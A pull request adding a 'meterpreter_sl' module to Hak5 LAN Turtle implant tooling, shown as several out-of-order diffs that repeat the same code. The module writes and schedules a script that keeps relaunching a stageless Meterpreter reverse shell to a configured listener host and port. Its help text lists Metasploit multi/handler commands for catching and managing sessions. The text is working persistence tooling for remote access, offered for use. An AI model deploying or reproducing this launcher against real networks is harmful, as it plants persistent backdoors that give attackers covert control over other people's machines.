### PR TITLE
New module meterpreter_sl

### DIFF
--- a/modules/meterpreter
+++ b/modules/meterpreter
@@ -10,35 +10,43 @@ CONF=/tmp/meterpreter.form
 : ${DIALOG_ESC=255}
 
 function start {
- if [ -s /etc/config/meterpreter ]
+  if [ -s /etc/config/meterpreter ]
   then
-    rm /tmp/meterpreter_exec
-    touch /tmp/meterpreter_exec
-    chmod +x /tmp/meterpreter_exec
+    if [ -x /etc/turtle/meterpreter/meterpreter_exec ]
+    then
+        echo "/etc/turtle/meterpreter/meterpreter_exec" | at now
+        echo "Meterpreter started with pid:"
+        pidof meterpreter
+    else
+        mkdir /etc/turtle/meterpreter
+        rm /etc/turtle/meterpreter/meterpreter_exec
+        touch /etc/turtle/meterpreter/meterpreter_exec
+        chmod +x /etc/turtle/meterpreter/meterpreter_exec
 
-    echo '''#!/bin/bash
-    rm /tmp/killmeterpreter
-    DATE=$(date)
-    IP=$(uci get meterpreter.host)
-    PORT=$(uci get meterpreter.port)
-    DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
-    [[ "$IP" == "" || "$PORT" == "" ]] && {
-    logger "Meterpreter: Error, configuration blank"
-    echo "Meterpreter: Error, configuration blank"
-    } || {
-    while [ ! -f /tmp/killmeterpreter ]; do
-    echo "Started Meterpreter at $DATE with $IP $PORT"
-    logger "Meterpreter: Started at $DATE with $IP $PORT"
-    /usr/bin/meterpreter $IP $PORT
-    done
-    rm /tmp/killmeterpreter
-    echo "Stopped Meterpreter at $DATE with $IP $PORT"
-    logger "Meterpreter: Stopped at $DATE with $IP $PORT"
-    }''' > /tmp/meterpreter_exec
+        echo '''#!/bin/bash
+        rm /tmp/killmeterpreter
+        DATE=$(date)
+        IP=$(uci get meterpreter.host)
+        PORT=$(uci get meterpreter.port)
+        DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+        [[ "$IP" == "" || "$PORT" == "" ]] && {
+        logger "Meterpreter: Error, configuration blank"
+        echo "Meterpreter: Error, configuration blank"
+        } || {
+        while [ ! -f /tmp/killmeterpreter ]; do
+        echo "Started Meterpreter at $DATE with $IP $PORT"
+        logger "Meterpreter: Started at $DATE with $IP $PORT"
+        /usr/bin/meterpreter $IP $PORT
+        done
+        rm /tmp/killmeterpreter
+        echo "Stopped Meterpreter at $DATE with $IP $PORT"
+        logger "Meterpreter: Stopped at $DATE with $IP $PORT"
+        }''' > /etc/turtle/meterpreter/meterpreter_exec
 
-    echo "/tmp/meterpreter_exec" | at now
-    echo "Stageless Meterpreter started with pid:"
-    pidof meterpreter
+        echo "/etc/turtle/meterpreter/meterpreter_exec" | at now
+        echo "Stageless Meterpreter started with pid:"
+        pidof meterpreter_sl
+    fi
  else
     echo "Meterpreter not configured"
   fi

--- a/modules/meterpreter
+++ b/modules/meterpreter
@@ -23,25 +23,25 @@ function start {
         touch /etc/turtle/meterpreter/meterpreter_exec
         chmod +x /etc/turtle/meterpreter/meterpreter_exec
 
-        echo '''#!/bin/bash
-        rm /tmp/killmeterpreter
-        DATE=$(date)
-        IP=$(uci get meterpreter.host)
-        PORT=$(uci get meterpreter.port)
-        DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
-        [[ "$IP" == "" || "$PORT" == "" ]] && {
-        logger "Meterpreter: Error, configuration blank"
-        echo "Meterpreter: Error, configuration blank"
-        } || {
-        while [ ! -f /tmp/killmeterpreter ]; do
-        echo "Started Meterpreter at $DATE with $IP $PORT"
-        logger "Meterpreter: Started at $DATE with $IP $PORT"
-        /usr/bin/meterpreter $IP $PORT
-        done
-        rm /tmp/killmeterpreter
-        echo "Stopped Meterpreter at $DATE with $IP $PORT"
-        logger "Meterpreter: Stopped at $DATE with $IP $PORT"
-        }''' > /etc/turtle/meterpreter/meterpreter_exec
+echo '''#!/bin/bash
+rm /tmp/killmeterpreter
+DATE=$(date)
+IP=$(uci get meterpreter.host)
+PORT=$(uci get meterpreter.port)
+DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+[[ "$IP" == "" || "$PORT" == "" ]] && {
+logger "Meterpreter: Error, configuration blank"
+echo "Meterpreter: Error, configuration blank"
+} || {
+while [ ! -f /tmp/killmeterpreter ]; do
+echo "Started Meterpreter at $DATE with $IP $PORT"
+logger "Meterpreter: Started at $DATE with $IP $PORT"
+/usr/bin/meterpreter $IP $PORT
+done
+rm /tmp/killmeterpreter
+echo "Stopped Meterpreter at $DATE with $IP $PORT"
+logger "Meterpreter: Stopped at $DATE with $IP $PORT"
+}''' > /etc/turtle/meterpreter/meterpreter_exec
 
         echo "/etc/turtle/meterpreter/meterpreter_exec" | at now
         echo "Stageless Meterpreter started with pid:"

--- a/modules/meterpreter
+++ b/modules/meterpreter
@@ -44,7 +44,7 @@ logger "Meterpreter: Stopped at $DATE with $IP $PORT"
 }''' > /etc/turtle/meterpreter/meterpreter_exec
 
         echo "/etc/turtle/meterpreter/meterpreter_exec" | at now
-        echo "Stageless Meterpreter started with pid:"
+        echo "Meterpreter started with pid:"
         pidof meterpreter_sl
     fi
  else

--- a/modules/meterpreter
+++ b/modules/meterpreter
@@ -18,8 +18,8 @@ function start {
         echo "Meterpreter started with pid:"
         pidof meterpreter
     else
-        mkdir /etc/turtle/meterpreter
-        rm /etc/turtle/meterpreter/meterpreter_exec
+        mkdir -p /etc/turtle/meterpreter
+        rm -f /etc/turtle/meterpreter/meterpreter_exec
         touch /etc/turtle/meterpreter/meterpreter_exec
         chmod +x /etc/turtle/meterpreter/meterpreter_exec
 

--- a/modules/meterpreter
+++ b/modules/meterpreter
@@ -10,23 +10,47 @@ CONF=/tmp/meterpreter.form
 : ${DIALOG_ESC=255}
 
 function start {
-  if [ -s /etc/config/meterpreter ]
+ if [ -s /etc/config/meterpreter ]
   then
-    echo "/etc/turtle/meterpreter/executable" | at now
-    echo "Meterpreter started with pid:"
+    rm /tmp/meterpreter_exec
+    touch /tmp/meterpreter_exec
+    chmod +x /tmp/meterpreter_exec
+
+    echo '''#!/bin/bash
+    rm /tmp/killmeterpreter
+    DATE=$(date)
+    IP=$(uci get meterpreter.host)
+    PORT=$(uci get meterpreter.port)
+    DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+    [[ "$IP" == "" || "$PORT" == "" ]] && {
+    logger "Meterpreter: Error, configuration blank"
+    echo "Meterpreter: Error, configuration blank"
+    } || {
+    while [ ! -f /tmp/killmeterpreter ]; do
+    echo "Started Meterpreter at $DATE with $IP $PORT"
+    logger "Meterpreter: Started at $DATE with $IP $PORT"
+    /usr/bin/meterpreter $IP $PORT
+    done
+    rm /tmp/killmeterpreter
+    echo "Stopped Meterpreter at $DATE with $IP $PORT"
+    logger "Meterpreter: Stopped at $DATE with $IP $PORT"
+    }''' > /tmp/meterpreter_exec
+
+    echo "/tmp/meterpreter_exec" | at now
+    echo "Stageless Meterpreter started with pid:"
     pidof meterpreter
-  else
+ else
     echo "Meterpreter not configured"
   fi
 }
 
 function stop {
   touch /tmp/killmeterpreter
-  kill $(ps | grep [/]usr/bin/meterpreter | awk {'print $1'})
+  kill $(ps | grep -w [/]usr/bin/meterpreter | awk {'print $1'})
 }
 
 function status {
-  if ps | grep -q [/]usr/bin/meterpreter; then echo "1"; else echo "0"; fi
+  if ps | grep -w -q [/]usr/bin/meterpreter; then echo "1"; else echo "0"; fi
 }
 
 function configure {
@@ -104,4 +128,3 @@ sessions -i [number]                    \n\
       clear;;
   esac
 }
-

--- a/modules/meterpreter
+++ b/modules/meterpreter
@@ -12,7 +12,7 @@ CONF=/tmp/meterpreter.form
 function start {
   if [ -s /etc/config/meterpreter ]
   then
-    if [ -x /etc/turtle/meterpreter/meterpreter_exec ]
+    if [ -s /etc/turtle/meterpreter/meterpreter_exec ]
     then
         echo "/etc/turtle/meterpreter/meterpreter_exec" | at now
         echo "Meterpreter started with pid:"

--- a/modules/meterpreter_sl
+++ b/modules/meterpreter_sl
@@ -24,25 +24,25 @@ function start {
         touch /etc/turtle/meterpreter/meterpreter_sl_exec
         chmod +x /etc/turtle/meterpreter/meterpreter_sl_exec
 
-        echo '''#!/bin/bash
-        rm /tmp/killmeterpreter_sl
-        DATE=$(date)
-        IP=$(uci get meterpreter_sl.host)
-        PORT=$(uci get meterpreter_sl.port)
-        DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
-        [[ "$IP" == "" || "$PORT" == "" ]] && {
-        logger "Stageless Meterpreter: Error, configuration blank"
-        echo "Stageless Meterpreter: Error, configuration blank"
-        } || {
-        while [ ! -f /tmp/killmeterpreter_sl ]; do
-        echo "Started Stageless Meterpreter at $DATE with $IP $PORT"
-        logger "Stageless Meterpreter: Started at $DATE with $IP $PORT"
-        /usr/bin/meterpreter_sl $IP $PORT
-        done
-        rm /tmp/killmeterpreter_sl
-        echo "Stopped Stageless Meterpreter at $DATE with $IP $PORT"
-        logger "Stageless Meterpreter: Stopped at $DATE with $IP $PORT"
-        }''' > /etc/turtle/meterpreter/meterpreter_sl_exec
+echo '''#!/bin/bash
+rm /tmp/killmeterpreter_sl
+DATE=$(date)
+IP=$(uci get meterpreter_sl.host)
+PORT=$(uci get meterpreter_sl.port)
+DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+[[ "$IP" == "" || "$PORT" == "" ]] && {
+logger "Stageless Meterpreter: Error, configuration blank"
+echo "Stagelss Meterpreter: Error, configuration blank"
+} || {
+while [ ! -f /tmp/killmeterpreter_sl ]; do
+echo "Started Stageless Meterpreter at $DATE with $IP $PORT"
+logger "Stageless Meterpreter: Started at $DATE with $IP $PORT"
+/usr/bin/meterpreter_sl $IP $PORT
+done
+rm /tmp/killmeterpreter_sl
+echo "Stopped Stageless Meterpreter at $DATE with $IP $PORT"
+logger "Stageless Meterpreter: Stopped at $DATE with $IP $PORT"
+}''' > /etc/turtle/meterpreter/meterpreter_sl_exec
 
         echo "/etc/turtle/meterpreter/meterpreter_sl_exec" | at now
         echo "Stageless Meterpreter started with pid:"

--- a/modules/meterpreter_sl
+++ b/modules/meterpreter_sl
@@ -1,0 +1,132 @@
+#!/bin/bash /usr/lib/turtle/turtle_module
+VERSION="1.0"
+DESCRIPTION="Stageless Metasploit payload to maintain shells"
+CONF=/tmp/meterpreter_sl.form
+AUTHOR=IMcPwn
+
+: ${DIALOG_OK=0}
+: ${DIALOG_CANCEL=1}
+: ${DIALOG_HELP=2}
+: ${DIALOG_EXTRA=3}
+: ${DIALOG_ESC=255}
+
+function start {
+ if [ -s /etc/config/meterpreter_sl ]
+  then
+    rm /tmp/meterpreter_sl_exec
+    touch /tmp/meterpreter_sl_exec
+    chmod +x /tmp/meterpreter_sl_exec
+
+    echo '''#!/bin/bash
+    rm /tmp/killmeterpreter_sl
+    DATE=$(date)
+    IP=$(uci get meterpreter_sl.host)
+    PORT=$(uci get meterpreter_sl.port)
+    DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+    [[ "$IP" == "" || "$PORT" == "" ]] && {
+    logger "Meterpreter: Error, configuration blank"
+    echo "Meterpreter: Error, configuration blank"
+    } || {
+    while [ ! -f /tmp/killmeterpreter_sl ]; do
+    echo "Started Stageless Meterpreter at $DATE with $IP $PORT"
+    logger "Stageless Meterpreter: Started at $DATE with $IP $PORT"
+    /usr/bin/meterpreter_sl $IP $PORT
+    done
+    rm /tmp/killmeterpreter_sl
+    echo "Stopped Stageless Meterpreter at $DATE with $IP $PORT"
+    logger "Stageless Meterpreter: Stopped at $DATE with $IP $PORT"
+    }''' > /tmp/meterpreter_sl_exec
+
+    echo "/tmp/meterpreter_sl_exec" | at now 
+    echo "Stageless Meterpreter started with pid:"
+    pidof meterpreter_sl
+ else
+    echo "Stageless Meterpreter not configured"
+  fi
+}
+
+function stop {
+  touch /tmp/killmeterpreter_sl
+  kill $(ps | grep -w [/]usr/bin/meterpreter_sl | awk {'print $1'})
+}
+
+function status {
+  if ps | grep -w -q [/]usr/bin/meterpreter_sl; then echo "1"; else echo "0"; fi
+}
+
+function configure {
+  if [ -s /etc/config/meterpreter_sl ]
+  then
+    meterpreter_sl_host=$(uci get meterpreter_sl.host)
+    meterpreter_sl_port=$(uci get meterpreter_sl.port)
+  fi
+
+  dialog --ok-label "Submit" \
+    --help-button \
+    --title "Stageless Meterpreter Configuration" \
+    --form "Stageless Meterpreter (Metasploit Module)\n\n\
+Enter the Host and Port of the target stageless meterpreter listener.\n \n" 14 60 2\
+    "Listen Host:"	1 1	"$meterpreter_sl_host"	1 14 48 0 \
+    "Listen Port:"	2 1	"$meterpreter_sl_port"	2 14 48 0 \
+  2>$CONF
+
+  return=$?
+
+  case $return in
+    $DIALOG_OK)
+      cat $CONF | { 
+        read -r meterpreter_sl_host
+        read -r meterpreter_sl_port
+        touch /etc/config/meterpreter_sl
+        uci set meterpreter_sl.host="$meterpreter_sl_host"
+        uci set meterpreter_sl.port="$meterpreter_sl_port"
+        uci commit meterpreter_sl
+        rm $CONF
+        clear
+      };;
+
+    $DIALOG_HELP)
+      dialog --title "Help" \
+        --msgbox "\
+Host - IP or Hostname of target stageless meterpreter listener\n\
+Port - Port number of target stageless meterpreter listener\n \n\
+     ,__,              For more Metasploit and Meterpreter Insight \n\
+     (oo)___           Watch Metasploit Minute with Mubix on Hak5!\n\
+     (__)    )\\        http://www.MetasploitMinute.com \n\
+        ||--|| *\n \n\
+Basic Metasploit Tips for Meterpreter Setup:\n \n\
+
+use exploit/multi/handler               \n\
+# Handles multiple meterpreter sessions\n \n\
+
+set PAYLOAD php/meterpreter_reverse_tcp \n\
+# Setting for Stageless Reverse TCP Meterpreter\n \n\
+
+set LHOST [host or ip]                  \n\
+# Hostname or IP of listener\n \n\
+
+set LPORT [port number]                 \n\
+# Port of listener\n \n\
+
+set ExitOnSession false                 \n\
+# Let the exploit continue when meterpreter exists\n \n\
+
+exploit -j                              \n\
+# Make the exploit a backgroundable job\n \n\
+
+sessions                                \n\
+# Lists sessions\n \n\
+
+sessions -i [number]                    \n\
+# Interacts with session number\n \n\
+" 20 74
+      configure
+      ;;
+    $DIALOG_CANCEL)
+      rm $CONF
+      clear
+      exit;;
+    $DIALOG_ESC)
+      clear;;
+  esac
+}

--- a/modules/meterpreter_sl
+++ b/modules/meterpreter_sl
@@ -11,35 +11,43 @@ AUTHOR=IMcPwn
 : ${DIALOG_ESC=255}
 
 function start {
- if [ -s /etc/config/meterpreter_sl ]
+  if [ -s /etc/config/meterpreter_sl ]
   then
-    rm /tmp/meterpreter_sl_exec
-    touch /tmp/meterpreter_sl_exec
-    chmod +x /tmp/meterpreter_sl_exec
+    if [ -x /etc/turtle/meterpreter/meterpreter_sl_exec ]
+    then
+        echo "/etc/turtle/meterpreter/meterpreter_sl_exec" | at now
+        echo "Stageless Meterpreter started with pid:"
+        pidof meterpreter_sl
+    else
+        mkdir /etc/turtle/meterpreter
+        rm /etc/turtle/meterpreter/meterpreter_sl_exec
+        touch /etc/turtle/meterpreter/meterpreter_sl_exec
+        chmod +x /etc/turtle/meterpreter/meterpreter_sl_exec
 
-    echo '''#!/bin/bash
-    rm /tmp/killmeterpreter_sl
-    DATE=$(date)
-    IP=$(uci get meterpreter_sl.host)
-    PORT=$(uci get meterpreter_sl.port)
-    DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
-    [[ "$IP" == "" || "$PORT" == "" ]] && {
-    logger "Meterpreter: Error, configuration blank"
-    echo "Meterpreter: Error, configuration blank"
-    } || {
-    while [ ! -f /tmp/killmeterpreter_sl ]; do
-    echo "Started Stageless Meterpreter at $DATE with $IP $PORT"
-    logger "Stageless Meterpreter: Started at $DATE with $IP $PORT"
-    /usr/bin/meterpreter_sl $IP $PORT
-    done
-    rm /tmp/killmeterpreter_sl
-    echo "Stopped Stageless Meterpreter at $DATE with $IP $PORT"
-    logger "Stageless Meterpreter: Stopped at $DATE with $IP $PORT"
-    }''' > /tmp/meterpreter_sl_exec
+        echo '''#!/bin/bash
+        rm /tmp/killmeterpreter_sl
+        DATE=$(date)
+        IP=$(uci get meterpreter_sl.host)
+        PORT=$(uci get meterpreter_sl.port)
+        DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+        [[ "$IP" == "" || "$PORT" == "" ]] && {
+        logger "Stageless Meterpreter: Error, configuration blank"
+        echo "Stagelss Meterpreter: Error, configuration blank"
+        } || {
+        while [ ! -f /tmp/killmeterpreter_sl ]; do
+        echo "Started Stageless Meterpreter at $DATE with $IP $PORT"
+        logger "Stageless Meterpreter: Started at $DATE with $IP $PORT"
+        /usr/bin/meterpreter_sl $IP $PORT
+        done
+        rm /tmp/killmeterpreter_sl
+        echo "Stopped Stageless Meterpreter at $DATE with $IP $PORT"
+        logger "Stageless Meterpreter: Stopped at $DATE with $IP $PORT"
+        }''' > /etc/turtle/meterpreter/meterpreter_sl_exec
 
-    echo "/tmp/meterpreter_sl_exec" | at now 
-    echo "Stageless Meterpreter started with pid:"
-    pidof meterpreter_sl
+        echo "/etc/turtle/meterpreter/meterpreter_sl_exec" | at now
+        echo "Stageless Meterpreter started with pid:"
+        pidof meterpreter_sl
+    fi
  else
     echo "Stageless Meterpreter not configured"
   fi

--- a/modules/meterpreter_sl
+++ b/modules/meterpreter_sl
@@ -32,7 +32,7 @@ function start {
         DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
         [[ "$IP" == "" || "$PORT" == "" ]] && {
         logger "Stageless Meterpreter: Error, configuration blank"
-        echo "Stagelss Meterpreter: Error, configuration blank"
+        echo "Stageless Meterpreter: Error, configuration blank"
         } || {
         while [ ! -f /tmp/killmeterpreter_sl ]; do
         echo "Started Stageless Meterpreter at $DATE with $IP $PORT"

--- a/modules/meterpreter_sl
+++ b/modules/meterpreter_sl
@@ -13,7 +13,7 @@ AUTHOR=IMcPwn
 function start {
   if [ -s /etc/config/meterpreter_sl ]
   then
-    if [ -x /etc/turtle/meterpreter/meterpreter_sl_exec ]
+    if [ -s /etc/turtle/meterpreter/meterpreter_sl_exec ]
     then
         echo "/etc/turtle/meterpreter/meterpreter_sl_exec" | at now
         echo "Stageless Meterpreter started with pid:"

--- a/modules/meterpreter_sl
+++ b/modules/meterpreter_sl
@@ -19,8 +19,8 @@ function start {
         echo "Stageless Meterpreter started with pid:"
         pidof meterpreter_sl
     else
-        mkdir /etc/turtle/meterpreter
-        rm /etc/turtle/meterpreter/meterpreter_sl_exec
+        mkdir -p /etc/turtle/meterpreter
+        rm -f /etc/turtle/meterpreter/meterpreter_sl_exec
         touch /etc/turtle/meterpreter/meterpreter_sl_exec
         chmod +x /etc/turtle/meterpreter/meterpreter_sl_exec
 


### PR DESCRIPTION
NOTE: This module requires pull request: https://github.com/hak5/lanturtle-files/pull/3 to be accepted before it will work.

Basically this module adds a new meterpreter module that uses a stageless payload which requires less network traffic when initializing a meterpreter session. 
